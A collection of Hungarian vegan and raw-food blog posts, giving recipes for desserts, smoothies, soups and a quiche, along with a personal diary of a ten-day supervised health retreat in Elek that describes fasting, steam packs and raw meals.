Ebédnél ismét jót beszélgettem egy -bizonyos tekintetben- ,,sorstársammal. Az őszes hajú hölgy ,,kolitisz ulcerosa betegséggel érkezett. Pedagógusként egy nagyon jó idézetet mondott nekem: ,,Ha a gyermek kirepül, vagy béklyókat adunk, vagy szárnyakat. A béklyók a sok rossz szokás, ami a szülőtől vett mintákból is ered. A gyermek a szüleit másolja, innentől kezdve óriási felelőssége van minden szülőnek, hogy milyen szokásokat vesz át gyermeke tőle. Ez érvényes táplálkozás és életvezetés tekintetében is.
Az itteni lét nagy hasznára volt neki is, mivel a napok alatt szokássá vált étkezési renddel sikerült a két étkezés közötti egészségtelen nassolást feladnia. Még többet tanult a vegán és a new start életmódról, amelyek gyakorlati alkalmazásához erőt, lendületet és persze tudást, ösztönzést kapott.
Emellett előnyként jelölte meg, hogy nem csak a nassolást, hanem a vacsorákat is sikerült kiiktatni az életéből. Persze már néhány kilót sikerült fogynia is. Számára erőt nyújt(ott) a turnus az elcsüggedés és az aggódás ellen is.
édességesség
időközben készülnek az édességek halomra. az étlapon persze nem csak ők szerepelnek, de a böjt óta nyers és vegán a konyhám, ami viszonylag könnyű és magától értetődő lett. remélem egyre inkább ebbe az irányba fognak tendálni a dolgok. csak hagyom hogy történjenek, figyelek és nem erőltetek semmit. az arányok és mennyiségek még változzanak, az egyensúly még alakuljon. de amúgy elégedett vagyok. ért egy kellemes meglepetés is: kaptam egy csodálatos kis csomagot gourmandéktól, próbáljam ki a termékeiket és alkossak velük, ha van kedvem. és naná, hogy van: egyrészt megtisztelő a rámgondolás, másrészt nagyon inspirálóak a termékeik. szép, igényes csomagolás, jó minőség, kreativitás.. az alkotás még folyamatban van, ezért erről most nem is írnék többet, de látogassatok el hozzájuk és nézzetek körül, érdemes! :)
Köles rudi
Mandulatúróból már készítettem hamis túró rudit, de kölesből még nem. Ugyan régebben a kölest is szoktam túróként használni palacsintába töltve, de ez a variáció még eddig nem jutott eszembe. Most meleg van, nem kívánom az édességet, de családnak jó csemege lesz. Hozzávalók: 1 csésze hántolt köles, xilit ízlés szerint, kb. kétszeres mennyiségű víz, mint a [...]
Káposztás gombóckák pikáns saláta kézben
Még mindig nem tudok betelni a kertben növő káposztáimmal, ilyen csoda dolgokat kreálok belőlük ? Hozzávalók a gombóckákhoz: 3 szem héjában főtt krumpli meghámozva 1 ek kukoricakeményítő, vagy 1 tojás 1 1/2 csésze tönkölyliszt (sacc) 1 kk tiszta só 1 pici fej édes káposzta 2 ek kókuszzsír 1 kk tiszta só A meghámozott főtt krumplit [...]
Eleki Egészségközpont 3. rész
2. nap napközben:
Ahogy tegnap ígértem, leírom a gőzpakolásról szerzett tapasztalataimat, mielőtt a gőzpakolásra elindulok. Tehát egy masszázságyra feküdtem, csak éppen nem masszázs várt rám. A felső testet kellett szabaddá tenni a ruháktól. Ezt követően kezelőm 2 vagy 3 törölközőt félbehajtva a hátamra helyezett. A törölközők egymáson feküdtek, tehát 4-6 réteg törölközőre rakta rá a felforrósított textilköteget. Majd egy nagy lepedővel letakarta a testemet, végül egy takaróval is úgy, hogy a lábfejem kinn volt a ,,dunsztból. Ha jól emlékszem, 3 percig engedte, hogy átmelegítse nem csak a derekamat, a gerincem környékét, hanem az egész testemet ez a gőzpakolás. Ezt követően hideg vizes kisebb törölközővel áttörölte a felmelegített hátamat, majd újból megismételte a gőzpakolást. Ez - ha nem tévedek - öt alkalommal ismétlődött meg. Nagyjából egy órát vett igénybe. Annyira ellazultak az izmaim, hogy olykor-olykor be is aludtam a kezelés alatt. Aztán felébredtem a hideg dörzsire.
1. kép: A szövetek, textíliák ebben a fém "dobozban" forrósodnak fel.
2. kép: A fém "doboz kívülről látható, a forróság a vezetéken keresztül érkezik.
3. kép: Többszöri nyitogatást követően a kb. 50 C fokos meleg már "csak" 44 C fokot mutat.
4. kép: A törölközők, amik tetejére a forró szövetet helyezik.
Az érdekessége, hogy a gőzpakoláshoz szükséges forró textíliák egy vastag falu fém ,,ládában kerülnek felforrósításra. (Ld:képek.)
Ilyen kezelést nem csak én kaptam. De szobatársam teljesen más kezelési móddal kerül gyógyításra. Neki az arcüregét kellett tegnap gőzölnie, ma pedig forró és hideg vizes váltakozással kap ,,arcfürdőt, amihez valami búvárpipa (?) is jár, a víz és a nyelőcső találkozásának megelőzésére. 3-5 perc körül a meleg vízben, max. fél percig pedig a hideg vízbe kell az arcát tennie. Érdekes. Számomra az.
Ami a mai kaját illeti... Reggeli ébredésemről beszámoltam, az alapján, hogy kevésbé voltam éhes.
A reggeli áhítat után kezelőm készített nekem egy zöld ,,löttyöt. Préselt petrezselyemlevél, 1 dl paradicsomlé és zöld alga por került kikeverésre. Sós íze volt, enyhén paradicsomos és petrezselymes. Mivel fél pohár sem volt, túlélve megittam kortyolgatva. Aztán idővel jött a reggeli. A fotón látható. Az ebéd pedig, nem sokkal különbözött a reggelitől, de azért arról is mutatok fényképet. Sajnos egy nagyobb része erősen citromos volt, így nem is ettem meg mindet, de a cukkini nyersen is finom volt.
A reggelim: cukkiniszeletek, jégsalátalevelek.
Az ebéd előétele: reszelt cukkini fokhagyma és só ízesítéssel.
Ez a főfogás: saláta, ruccola, cukkini, paprika, lilahagyma. Csinos volt, csak nagyon citromos. :(
A salátához "köret" is járt: zellerszár. Nem tudom, vicces, vagy elgondolkodtató, vagy mindkettő?
Másfél órája elfogyasztottam. Éhes vagyok-e? Az igazság az, hogy egyikkel sem laktam túl jól. Éhes csak olyan szinten vagyok, hogy vágyom a ,,normális kajára. Egy jó kis borsófőzelék, na az tuti jól esne. A gyomrom nem kíván semmit különösebben. Ez utóbbit is csak a megszokás mondatja velem, hiszen egy hétköznapi ember jellemzően nem így táplálkozik, még ha úton is van a vegán táplálkozás felé. Szóval ez nyers koszt. Ami a folyadékbevitelemet illeti... Tegnap kibírtam tea nélkül (nem kötelező), vizet ittam. Peridotot (lúgos víz, éhgyomorra kifejezetten ajánlott) és tisztított helyi vizet. Mint a legelső bejegyzés elején a települést bemutattam, Gyula itt van a szomszéd helység. Nos a víz, képzelhetitek... Hiába tisztított víz (valami ozmózisos, ami be van építve a mosogató mellé), ugyanis az íze és a bukéja egy az egyben olyan, mintha a gyulai fürdőben lubickolnék. Ezek után már persze reggel nem bírtam más vizet inni. Szobatársamtól kaptam egy pohár hideg peridotot - éhgyomorra jól jött, de elmentem az egyik boltba venni magyar ásványvizet - olyat, aminek alig van íze. Azt iszogatom, szigorúan betartva az egészséges ivás szabályát: étkezés után bő egy órával iszom először. Így nem zavarja meg a gyomrot az emésztésben a folyadék. Ezt annak is ajánlom, aki nem böjtöl, nem diétázik, stb.
Ellenben örülhetek, mert ma már táplálékhoz jutottam. Viszont van olyan vendég, akinek a böjtje ma indult el, így nem ehetett velünk.
Már csak annyit akartam írni, hogy külön diétája van a pajzsmirigy, cukor, rákos, stb. betegséggel küzdő embereknek. Ez alapján nem mindenkinek egyforma az étel, amit reggel-délben- este elfogyaszt. Én ma nem vacsorázok - ez a rendelet.
Most készülök a gőzpakolásra, aztán ha lesz időm, még élessé teszem ma a bejegyzésemet. Lett időm...:)
Fahéjas zabgolyók
Házi zabtejből megmaradt szárazanyagból készítettem ezt a fahéjas zabgolyót. A fahéj ugyan melegítő fűszer, és ebben a melegben nem biztos, hogy szerencsés, de én ezt most kigondoltam, és meg kellett csinálnom. Nagyon finom, nyers desszert. Hozzávalók: házi zabtejből megmaradt szárazanyag, mandula őrlemény, szezámmag, kókuszzsír, méz (vagy más növényi édesítő), díszítéshez: aszalt gyümölcs: én mazsolát használtam, [...]
Eleki Egészségközpont
Elek Gyulától 15 km-re lévő tiszta, rendezett, csendes, jó levegőjű kisváros. Havonként tíznapos kiscsoportos turnusokat szerveznek azoknak, akik különböző civilizációs, krónikus betegségekben szenvednek (szív és érrendszeri megbetegedések, daganatos betegségek, cukorbetegség, súlyfelesleg, reumatikus eredetű betegségek, stressz okozta betegségek, autoimmun folyamatok kiváltotta betegségek, stb.). A gyógyítások, programok orvosi felügyelet mellett zajlanak.
Az egészségközpont célja, hogy segítsen a kialakult betegségek okának feltárásában. Az egészséges élet nyolc alapelve szerint állítják össze a programot, amelyek elsajátításához segítséget nyújtanak. A program megvalósítása az ide érkező vendégek és az itt dolgozó orvosok, kezelők közös munkája, amit ki-ki otthonába visszatérve önállóan tud folytatni.
Júliusi bejegyzéseimet tapasztalati beszámolókkal kezdem. Ugyanis lehetőségem adódott kipróbálni itt Eleken egy ilyen 10 napos ,,egészséghetet. Még nem vagyok itt 24 órája, de eddig jóformán minden elnyerte a tetszésemet. 11-12 gyógyulni, javulni, fejlődni vágyó beteggel osztozom ezen a vendégházon, amely 2 éve épült, de még nem nyerte el végleges formáját, hiszen a belső kert rendezése és még néhány fizikailag elkészíthető terv megvalósítása hátra van. Szerencsére ez nem igazán rontja az itteni tartózkodás hangulatát. Cukorbetegek, PCO szindrómás beteg, Inzulinrezisztenciával küzdő ember, asztmától és pánikbetegségtől szenvedő páciens, ekcémás, alhasi felfázással bajlódó asszony, mozgásában nehézkes (mankóval járó, ill. gerincsérves) gyógyulni vágyó, emésztési problémákkal küzdő, glutén-érzékeny beteg, fogyni vágyó, dohányzásról leszokó, pajzs alul működéssel, magas koleszterinnel, magas vérnyomással együtt élő vendég is van a csapatban. Sőt, vannak, akiknek halmozott problémákkal érkeztek. Tudomásom szerint jelen turnusban rákos beteg nincsen, de az utóbbi turnusokban érkezett ide rákos beteg.
Nyilván én sem makkegészségesen kerültem ide. Mint minden embernek, az én életemben is vannak ,,bajok. Amelynek okait szeretném, amennyire csak lehet, megszüntetni. Ehhez igyekeznek igazán lelkiismeretes hozzáállással segítséget nyújtani.
Én pedig igyekszem megosztani tapasztalataimat, véleményeimet, legújabb ismereteimet.
Ez az első nap, aminek még a felén alig vagyunk túl. Azért írom, hogy alig, mert a közel másfél órás orvosi vizsgálat és korábbi leleteim áttanulmányozását követően közösen arra a nevezőre jutottunk, hogy ma jobb, ha nem eszem. Nem eszem, csak iszom. Azt is vizet és legfeljebb teát. Már 14 óra, kb. 5 órakor ébredtem. (Amúgy 6-kor van ébresztő.) Tehát 7 óra ,,böjtön vagyok túl eddig sikeresen. Reggel ,,ittam 2 és fél kanál ricinusolajat. Kezelőm alacsonyabb és jóval vékonyabb súlykategória, így ő csak 1 kanállal. Szolidaritást vállalva velem együtt nem eszik ma. :)
Szóval azért ittuk ezt a ricinusolajat, hogy segítsen a reggeli székletnél (nem csinált egész, de még fél napos hasmenést sem). Míg a többiek reggeliztek, mi tettünk egy bő fél órás intenzív sétát, hogy a szükséges reggeli ,,sport egy része kipipálható legyen.
Majd egészségügyi előadás is volt, amit közös torna követett kb. szintén fél órán keresztül. A második testmozgás után egyfajta főzőkör, főzőtanfolyam volt, amit egy fiatal kismama tartott. Most csak elméleti oktatás volt, amit nem bántam cseppet sem, mert elég volt az ételeket hallgatnom, hogy korogjon a gyomrom egyet. :)
Főzőkör után pedig a többiek esznek, én pedig írom a blogom, sokak okosodására - legalább is remélem így van.
Következő programomra - ami gerincre történő gőzpakolás - most folyik az előkészület. Hamarosan gőzpakolást helyeznek el a gerincemen. Még sosem volt ilyenben részem. Hurrá! Új dolgot próbálok ki. Ráadásul a meleg dolgokért rajongok. Szauna, forró vizes fürdő, termálvíz. Ezekkel szeretem kényeztetni a testem. Még nyáron sincs ellenemre.
Különben reggel és este is egyfajta ,,áhítattal kezdjük és zárjuk a napot. Majd ha eljutok odáig, ezekről is beszámolok.
Na igen, most jött el az első pillanat, hogy úgy érzem, éhes vagyok. Iszom is egy kis tisztított vizet.
Később - talán még ma, jelentkezem, de most következik a gőzpakolás...
Az egészségház bal szárnya
Az egészségház bal szárnya
Az egészségház közös étkezője
Az egészségház teakonyhája, sok teával
Hűsítő Rizses - Málna
2012. június 29. Fittanyuka Blog
Rizses málna, málnás rizs hidegen:) Nevezhetjük rizses málna fagyinak is.... Hozzávalók: 350 g fagyasztott málna 100 g barna rizs 500 ml rizstej 250 ml kókusztejszín 2 evőkanál méz, vagy 1/2 kávéskanál stevia vanília rúd A barna rizst 1-2 órára vízbe beáztatjuk, majd leöntjük róla és a rizstejben a vanília rúddal együtt puhára főzzük. ( ha szükséges hozzáöntünk még vizet vagy tejet). Hagyjuk kihűlni. Még jobb ha pár órával előtte vagy előző nap megfőzzük. A málnát a mézzel ( vagy a steviával), a kókusztejszínnel együtt turmixgépben krémesre keverjük, majd hozzá keverjük a rizst. Ha szükséges még édesítjük és fagyi szedővel halmokat formálunk. Mélyhűtőben tároljuk a maradékot, ha marad:) Nálunk nem maradt:) Fittanyuka
Málnás kölespuding feketeribizlivel
2012. június 28. Mindennapi ételeink
Nagyon szeretjük a kölest, és mivel megjelent a piacon a málna, ami szintén egyik nagy kedvencünk, most a kettőt ötvöztük. :-) Remek reggeli vagy ebéd utáni csemege. Hozzávalók: 12,5 dkg köles 5,5 dl rizstej 1 tk. vaníliapor 5 dkg nyírfacukor 1/2 citrom héja 1/2 kb málna, összeturmixolva Elkészítés: Nemrég kaptunk egy ritka finom rizstejet, a Vegetár Kft-től. Nagyon kellemes, krémes. Így most ezzel készítettem el az édességet: feltettem főni, majd forráskor beleöntöttem a kölest, majd puhulásig főztem. Ekkor ízesítettem nyírfacukorral, vaníliával, citromhéjjal. A málnát megmostam, beletettem és együtt összeturmixoltam, nem túl krémesre, hogy kása jellege is legyen a dolognak. Szombaton a fagyasztóba tett fekete ribizlivel ettük.
Meggykrémes palacsinta
Meggyes valamire vágytam csokival, előbb a fagyi jutott eszembe, de mivel már van néhány változat a fagyasztóban, ezért gondoltam legyen inkább valami más. Nem túl magos, mégis laktató, rostos desszert. Ráadásul annyi cukkínim van, hogy csak vakarom a fejem, mit is csináljak belőle. Az aszalt gyümölcslapból készülő palacsinta is finom, de nekem az valahogy nem palacsinta. Ennek a verziónak sokkal semlegesebb az íze, az állaga pedig a francia palacsintáéra hasonlít A palacsintához: 3/4 bögre összevágott cukkíni 1/2 bögre őrölt lenmag 1/2 bögre datolya egy kis vanília 1 tk citromlé 2tk víz egy csipet só A cukkínit összeturmixoltam, majd hozzáadtam a többi hozzávalót, kivéve az őrölt lenmagot. Ezt csak utólag adtam a masszához, és simára turmixoltam Sűrű masszát kapunk, ebből az aszaló tapadásmentes lapján 4 db palacsintát kenünk ki kb4-5 mm vastagon. (Egy lapra 2 palacsinta is elfér) Kb. 7 órán át aszaljuk, ezután levesszük a tapadásmentes lapról és további félórát szárítjuk. Az a lényege, hogy ne legyen merev, még hajlítható maradjon. Így sokáig eltárolható légmentesen elzárva, úgyhogy érdemes egyszerre több adagot is elkészíteni. A meggykrémhez (4-5 palacsintához): 15 dkg magozott meggy 5-6 dkg aszalt vagy áztatott mandula vanília kókuszcukor vagy más édesítő ízlés szerint 50 ml olvasztott kókuszolaj néhány csepp bergamott olaj (elhagyható) Mindent krémesre turmixolunk a kókuszolaj kivételével, ezt akkor adjuk a turmixhoz, amikor az már krémes, egynemű. Kb. 20-30 percre hűtőbe tesszük a krémet. A csoki öntethez: 1/2 bögre méz 1,5 ek nyers kakaópor (hagyományossal is elkészíthető) 1,5 ek nyers karobpor (itt is lehet a megszokottat használni) 50 ml A krémmel megkenjük a lap egyik felét, a másikat pedig ráhajtjuk. Meglocsoljuk a csokin öntettel.
Vegán csokoládé jégkrém pirított mandulával
2012. június 27. Zizi kalandjai
Két napja ígértem vegán csokis jégkrémet, ugye? Vagyis ti szavaztátok meg Facebookon, hogy először ennek jöjjön a receptje és utána a quinoa fasírtnak (ami szintén nagyon finom). Az ígéret szép szó...
Amióta beszereztem a szilikon jégkrém formát, nem tudom abbahagyni a jégkrém készítést. Nyáron inkább ezek az édességek nálunk sütik helyett. Azokat is imádjuk továbbra is, csak, ha meleg van, nincsen kedvem bekapcsolni a sütőt. A jégkrémhez meg pikk-pakk összekeverem a hozzávalókat és már hűlnek is a fagyasztóban. Javaslom, hogy próbáljátok ki. Jó móka a saját jégkrémedet enni. A legjobb pedig, hogy te állítod össze az ízeket, te választod ki az alapanyagokat, nincs benne töménytelen mennyiségű cukor, tudod, hogy mi kerül bele és mellőzve vannak az E-s nyalánkságok.
Ennek a jégkrémnek a nyers csokoládétorta adta az alapját, vagyis azt dolgoztam át minimálisan, hogy jégkrém legyen belőle. Ennyire egyszerű vegán csoki jégkrémet készíteni.
Ki veszi meg az ötletemet, hogy nagyban vegán jégkrém készítésbe kezdjen? :)
Vegán csokoládé jégkrém pirított mandulával
Hozzávalók 4 db jégkrémhez:
- 1 db érett avokádó, meghámozva, kimagozva
- 50 g kakaópor (cukrozatlan)
- 60-70 g kókuszvirág cukor vagy nádcukor
- 30 g kókuszzsír, felolvasztva
- 100-150 ml mandulatej (rizstej, zabtej, szójatej is használható)
- 1 vaníliarúd kikapart magjai
- csipet só
- kis maréknyi mandula
A mandulát száraz serpenyőben 5-6 perc alatt pirítsuk meg, aprítsuk durvára, majd tegyük félre.
A többi hozzávalót tegyük a robotgépbe és pürésítsük simára. Ha túl sűrűnek találjuk, adjunk még hozzá egy kis mandulatejet. A pirított mandula felét szórjuk a formákba, egyenlően kanalazzuk bele a csokis keveréket, szórjuk meg a tetejüket a maradék mandulával, majd helyezzünk pálcikát mindegyikbe és tegyük a mélyhűtőbe kb. 2 órára.
Tessék...
Mákos-almás nyers süti
Sületlen nyers süti A mákos kókusztejből megmaradt szárazanyagból készítettem az alapját ennek a desszertnek, de lehet simán teljes mákból és kókuszreszelékből is készíteni. A máktej és kókusztej receptjét itt találod: máktej és kókusztej. Lehet együtt is turmixolni a kettőt, így kapsz mákos kókusztejet. Szóval: a szárazanyaghoz tettem egy kis mézet (vagy lehet édesítésnek aprítógépben datolyavajjá [...]
Narancsos mentás limonádé
Frissülj fel finom, egészséges limonádéval a meleg nyári napokon!
A recept:
Hozzávalók:
1 csomó mentalevél (fodormenta az igazi, frissen szedve, akinek ez megadatik)
2 narancs
víz
esetleg édesítő (méz, gyümölcscukor, nyírfacukor, barna cukor, stb...)
kancsó
Elkészítés:
A mentaleveleket megmossuk és a kancsóba tesszük. A narancsok héját alaposan megtisztítjuk. Az egyik narancsot felkockázzuk, a mentalevelekre helyezzük. Először kb. 1-2 dl meleg vizet töltünk hozzá. Így az aromák, ízek, jobban és gyorsabban érvényesülnek. Ezután kicsavarjuk a másik narancsot, hozzáöntjük, majd hideg vízzel felengedjük. Tálalásnál jégkockát is adhatunk hozzá. Ha mindenki édesszájú, akkor eleve készíthetjük édesen. Esetünkben az asztalra némi szőlőcukor is került, aki édesebben kívánta, tett a poharába egy-két teáskanállal. A szőlőcukor ugyanis szinte azonnal feloldódik.
Ezt elkészíthetjük a vendégek érkezése előtt azonnal, vagy akár néhány órával is.
Zöldséges quiche
2012. június 21. Vegetáriánus ételek
Zöldséges quiche Zöldséges quiche Összetevők (4 főre):Tészta összetevők: (20 cm-es tortaformához) 15 dkg tönköly teljes kiőrlésű liszt 7 dkg tönköly sima liszt 7 dkg zsiradék: ezek lehetnek kókuszzsír, pálmazsír vagy vaj Pírított szezámmag Őrölt kakukkfű, só bors Kevés hideg víz Töltelék: 2 bögre ízlés szerinti zöldség (például: kelbimbó, répa, mángold, zöldbab, édeskömény, brokkoli, karfiol, stb...) Só, curry Tofukrém: 20dkg natur tofu 1 evőkanál mustár 1 gerezd fokhagyma Só, bors 1 dlkókuszolaj 1 dlhidegen sajtolt napraforgó olaj 1 citrom leve 1 nagy főt répa (elhagyható) Elkészítése a következő. Tészta: Összedolgozzuk (azaz egyneműsítjük) az anyagokat (lisztek, só, víz és zsiradék) ezt a tésztát kinyújtjuk fél cm vastagságúra, megkenjük a tészta felületét olvasztott kókuszzsírral, pirított szezámmaggal meghintjük, és őrölt kakukkfűvel megszórjuk. A tésztát téglalapalakúra nyújtjuk ki, majd először a hosszabbik széleket hajtogatjuk egymásra, majd a másik két végét is egymásra hajtjuk, újból kinyújtjuk és a tortaformába helyezzük, úgy hogy 3 cm pereme legyen a tésztának. Töltelék: 2 bögre ízlés szerinti zöldséget vágunk fel apró darabokra (például: kelbimbó, répa, mángold, zöldbab, édeskömény, brokkoli, karfiol, stb) és fűszerezzük sóval és curryvel. Tofukrém: Az összes hozzávalót turmixgépben krémesre egyneműsítjük, majd összekeverjük a párolt zöldségekkel, beöntjük a tortaformába, szépen, egyenletesen eloszlatjuk, előmelegített sütőben 200 fokon 20-25 percig sütjük. Elkészítés időtartam (előkészületekkel és sütéssel együtt): kb. 1 óra 15 perc Rigó László Vezető Séf
R.A.B.= Ribizlis Almás Banánturmix :)
Korábban már említettem, hogy ha a gyermekünk nem fogyaszt gyümölcsöt, inkább csak cukor, csoki, gumicukor, chips ételeknek nem nevezhetők érdeklik, azonban szeretnénk, ha gyümölcsöt fogyasztana, készítsünk neki turmixot. Néhány elfogyasztását követően a nagyobbakat megtaníthatjuk az elkészítésére, hiszen igazán nem nagy feladat. Most is egy rendívül egyszerű turmix receptjét osztom meg. Érdemes figyelmesen elolvasni mert további ötleteket adok.
A recept:
Hozzávalók:
1 alma
1 banán
fél maroknyi ribizli
édesszájú turmixolóknak gyümölcscukor vagy barna cukor, vagy méz (vagy ki mit használ)
1 dl víz
Elkészítés:
Az almát megmosás után héjastul a turmixba daraboljuk. Utána a banánt héjától megfosztva szintén a turmixedénybe szeleteljük. Végül a megmosott, lecsumázott ribizliszemeket is. Ha édesítünk, hozzáteszünk édesítőszert (én kihagytam, mert a banán így is elég édes), 1 dl vízzel felöntjük és kész is a remek nyári italunk. Amit különben reggelire is fogyaszthatunk hőséggel megáldott napjainkon.
A turmixot rövid ideig állni hagytam, mielőtt pohárba öntöttem volna. Különvált a vizes rész a gyümölcsrosttól, így azt kitöltöttem és megittam. Finom íze volt a rózsaszín lének.
Ha víz helyett növényi tejjel, vagy tejszínnel készítjük, dúsabb ízhatást kapunk. Mindkét elkészítési módnál fagyasztóba is tehetjük és megdermedés után kész a vegán jégkrémünk! :)
Mogyorós - vaníliás keksztorta
Nemrégiben találtam az archívumban ezt a tortát, ami még 2 évvel ezelőtt készült és jelent meg aztán a Délmagyarország hétvégi gasztromellékletében.:-) Sütés nélkül készül, nagyon finom, és igen gyorsan elfogyott!:-) És most felteszem ide is, hálám jeléül minden kedves olvasómnak, aki rendületlenül érdeklődik privátban, mikor folytatom a blogot...:-) Gondolattal irányított blogírás nincs még?:-)) Mert akkor nagyon gyorsan haladnék ám!:-)))) Mogyorós - vaníliás keksztorta Hozzávalók (egy 22 cm-es kapcsos tortaformához): A kekszalaphoz: 300 g vegán (tej- és tojásmentes) keksz (pl. DM-ben a Digestive keksz) 3 ek. karobpor vagy 4 ek. kakaó 100 g növényi margarin/ kókuszzsír 4 ek. agave szirup (esetleg méz) egy marék mogyoró A vegán cukrászkrémhez: 30 g rizsliszt 15 g kukoricakeményítő 500 ml növényi tej (a legjobb a vaníliás szójatej) 30 g növényi margarin egy csipet őrölt vanília egy csipet kurkuma 1 bio (kezeletlen) citrom héja 2 ek. nádcukor egy csipet só Először a krémet készítsük el. Egy kis lábasban felolvasztjuk a növényi zsiradékot, majd beleszórjuk a lisztet és a keményítőt, kis növényi tejjel felöntve. Lehúzzuk a tűzről, és habverővel kavargatjuk, hogy ne csomósodjon. Hozzáadjuk a maradék tejet, a csíkokra vágott citromhéjat, a vaníliát, és egy csipet sót. Folyamatos keverés közben felforraljuk, és kb. 5 percig főzzük közepes lángon, hogy besűrűsödjön. Kihűtés előtt a citromhéj darabokat kivesszük a krémből, majd fóliával letakarva, hagyjuk kihűlni. Egy konyhai aprítógép segítségével morzsásra aprítjuk a kekszet a mogyoróval. Beletesszük a karobport, a felolvasztott margarint/ kókuszzsírt, és az agave szirupot. Az így kapott masszát belesimítjuk a tortaforma aljába (ha nem áll össze kellően a kekszalap, adhatunk még hozzá egy kis növényi tejet), és rásimítjuk a kihűlt krémet. Díszítésnek megszórhatjuk a tetejét aprított (esetleg pirított) mogyoróval. Tipp: amennyiben vaníliás szójatejjel készítjük a krémet, figyeljünk rá, hogy az karakteresen édesített. A krémet ehhez igazodva édesítsük!
Édeskömény krémleves
2012. június 16. Lét-tudatos konyha
Az intenzív illatú édeskömény íze nagyon kellemes, nem uralkodó az alábbi levesben. Hozzávalók: 60 dkg burgonya 1 kisebb édeskömény 1 újhagyma 2 evőkanál olívaolaj 1 kávéskanál őrölt bors 1 csapott evőkanál só 2 l víz
Epres almás kókuszos turmix (vegán)
Ha fogytán az eprünk már, vagy csak más ízben is ki szeretnénk próbálni a turmixot, készítsük el almával, és zabpehely helyett kókusszal. A recept: Hozzávalók: fél marék eper 1 vagy két alma fél marék kókuszreszelék víz Elkészítés: A kókuszreszeléket felöntjük (ellepje) vízzel és sűrűre megfőzzük. Kihűtjük kicsit majd a turmixgépbe tesszük (lehet, nem fog mind beleférni, csak a fele...) A megmosott almát héjastul beledaraboljuk, majd a megtisztított eperszemeket rárakjuk és indulhat a turmixolás. Egy-két-há és kész az eperturmix. Akinek nem elég édes, édesítheti gyümölcscukorral, vagy mézzel, vagy barnacukorral. Egészséges, finom, laktató, és ez is, mint a többi turmix pikk-pakk fogyasztható. Ilyenkor nyáron egy jó reggeli, vagy egy délutáni frissítővel is felér. Többihez hasonlóan más gyümölcsökkel is próbálkozhatunk. (Meggy, cseresznye, ribizli, stb.)
Egészséges eperturmix (vegán)
"Híres leszek, szólt az eper, tudom, hogy rám büszke leszel. És az eper tovább halad, milyen sok ház, magas falak! Nem tettek ki névtáblákat, mert nincs neve az utcának. Itt egy gyümölcs, - szólt apóka, legyen ő a névadója! Az eperszem nagyon boldog, napsugár is rámosolygott. Eperről szól már a nóta, utcát neveztek el róla." (Lupsánné Kovács Eta: Az eper álma - részlet -) Könnyed, de laktató reggeli receptje eperrel: A recept: Hozzávalók: 1 marék eper fél marék zabpehely víz kókuszreszelék Elkészítés: A zabpelyhet kicsit megpirítjuk, majd vízzel felöntjük (ellepje) és megfőzzük. Kihűtjük kicsit és a turmixgépbe tesszük (lehet, nem fog mind beleférni, csak a fele...) Az megtisztított eperszemeket rárakjuk és indulhat a turmixolás. Egy-két-há és kész az eperturmix. Akinek nem elég édes, édesítheti gyümölcscukorral, vagy mézzel, vagy barnacukorral. Tálalásnál egy kevés kókuszreszelékkel és pár szem eperrel díszítjük. Egészséges, finom, laktató, pikk-pakk fogyasztható.
Eperkrémleves stevia sziruppal
Nehezen akar beköszönteni az igazi végleges nyári idő, de a gyümölcsök ettől függetlenül szép sorban érnek. Az idei évben kicsit hiányoltam az epret a piacokról, valahogy mintha kevesebb lett volna mint máskor. A szabadföldi termesztésűre gondolok természetesen, mivel úgyis csak annak van igazi napérlelte íze. Ezt a levest most steviaval és banánnal édesítettem. A stevia sziruphoz a kertből szedtem néhány levelet és forró vízben kifőztem, de a bolti megoldás is tökéletes. Hozzávalók: 500 g eper 3 banán stevia szirup víz - Az epret tisztítsuk meg és jó alaposan mossuk meg. - Botmixerrel vagy turmix géppel pépesítsük az epret és a banánt addig, amíg egy jó krémes egyveleget kapunk. - Hígítsuk vízzel a levest számunkra megfelelő állagúra. - Adjunk hozzá ízlés szerint stevia szirupot, majd tartsuk legalább egy órán át hűtőben, mert úgy lesz a legfinomabb. Ildi :-)
Zabkása (eperrel) egészségesen
Lev Tolsztoj hitte, hogy a húsevés elhagyása kulcsfontosságú ahhoz, hogy az ember uralkodni tudjon szenvedélyein. Rendkívül szigorúan vette a vegetáriánus táplálkozás szabályait: mindössze zabkását, kenyeret és zöldséglevest fogyasztott. Felhagyott az italozással és a dohányzással, és megpróbálta meggyőzni a birtokán élő parasztokat, hogy utánozzák. "Miért kábítják magukat az emberek?" című esszéjében Tolsztoj az alkoholról és a cigarettáról is becsmérelő hangon szólt, kábítószernek titulálva őket, ugyanis meggyőződése volt, hogy az emberek e két szert érzéstelenítőként használják nyugtalan lelkiismeretük elaltatására. Az író szerint az emberi élet zavarodottsága elsősorban a folyamatosan mérgezett állapotból származik. Tolsztoj nyomdokaiba is lépve, egy igen egészséges reggeli csemege receptjét osztom meg. Ez nem más, mint a helytelenül nélkülözött zabkása receptje. Sokakban talán a kása, sőt a zabkása hallatán negatív gondolatok támadnak, de csak azért, mert még nem ettek finoman egészséges zabkását. Roppant egyszerű titka van a finom íz elérésének: Jó érett gyümölccsel kell ízesíteni! (Télen pedig lekvárral vagy aszalt gyümölcsökkel is lehet.) A recept: Hozzávalók: - 1 adag zabpehely - víz - 1 marék gyümölcs - napraforgómag - őrölt lenmag - őrölt szezámmag - őrölt mák - kókuszreszelék Elkészítés:A zabpelyhet mielőtt vízzel felöntjük, érdemes egy kicsit megpirítani, vigyázva arra, hogy a szemek ne égjenek meg. Miután megpirítottuk a zabpelyhet, vizet öntünk rá, hogy bőven ellepje és közepes lángon elkezdjük főzni - nagyon gyorsan megduzzad, felszívja a vizet.Miután megfőtt, hozzákeverjük a magvakat, majd a felaprított gyümölcsöt. Kókuszreszeléket tehetünk hozzá tálaláskor vagy főzés közben is. Aki nagyon édes szájú, ízesítheti mézzel, gyümölcscukorral vagy aszalt gyümölcsökkel.Tápláló reggeli, ami segít a szervezet reggeli "takarításában" is. Sok ásványi anyagot és vitamint tartalmaz. Olcsó és kiadós reggeli. Ha jól lakunk vele reggel, kevésbé leszünk éhesek napközben. A másik előnye, hogy 30 perc alatt nem csak elkészül, de el is fogyhat. :) Ízvilága tovább turbózható növényi tejjel is.
Étcsokoládéba mártott eper
2012. június 8. Fittanyuka Blog
